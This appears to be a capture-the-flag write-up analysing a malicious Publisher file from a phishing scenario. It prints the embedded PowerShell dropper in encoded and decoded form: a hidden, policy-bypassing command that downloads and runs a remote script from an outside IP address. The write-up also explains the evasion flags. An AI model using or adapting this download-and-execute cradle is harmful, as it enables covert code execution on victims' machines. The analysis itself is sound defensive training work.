Publish3r

Challenge:

We believe we found a malicious file on someone’s workstation. Judging by looking at it, the file likely came from a phishing email. Anyways, we’d like you to analyze the sample, so we can see what would have happened if it executed successfully. That way we can hunt for signs of it across the enterprise. Your flag will be the URL that the malware is trying to reach out to! Can you do it? Format: MetaCTF{http://………}

Note: We’ve put the actual file in an encrypted 7z so your browser doesn’t complain when downloading it (and our site doesn’t get flagged as malware). The password is metactf

Solution:

The 7z archive contained a Microsoft Office Publisher file and my initial steps were to review the EXIF metadata for any easy clues as well as dumping strings from the file. During the process of reviewing the strings output I found a PowerShell command:

$ strings Publish3r.pub
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec Bypass -windowstyle hidden -enc SQBFAHgAIAAoACgAbgBFAFcALQBPAEIASgBlAEMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACgAIgBoAHQAdABwADoALwAvADEAMwAuADMANwAuADEAMAAuADEAMAA6ADQANAA0ADMALwBkAG8AYwAvAHAAYQB5AGwAbwBhAGQALgBwAHMAMQAiACkAKQApAA==

The embedded PowerShell in a Publisher file is questionable on its own but the added parameters make it highly suspicous.

  1. The -exec Bypass parameter makes it possible to bypass the the script execution policy
  2. The -windowstyle hidden hides the console window while PowerShell is running
  3. The -enc flag tells PowerShell the command is Base64 encoded

We can use the base64 utility to decode the command:

printf "SQBFAHgAIAAoACgAbgBFAFcALQBPAEIASgBlAEMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACgAIgBoAHQAdABwADoALwAvADEAMwAuADMANwAuADEAMAAuADEAMAA6ADQANAA0ADMALwBkAG8AYwAvAHAAYQB5AGwAbwBhAGQALgBwAHMAMQAiACkAKQApAA==" | base64 -d

IEx ((nEW-OBJeCt net.webclient).downloadstring(("http://13.37.10.10:4443/doc/payload.ps1")))

The decoded command contained the URL needed to complete the challenge flag.

Published:

Updated:

Leave a comment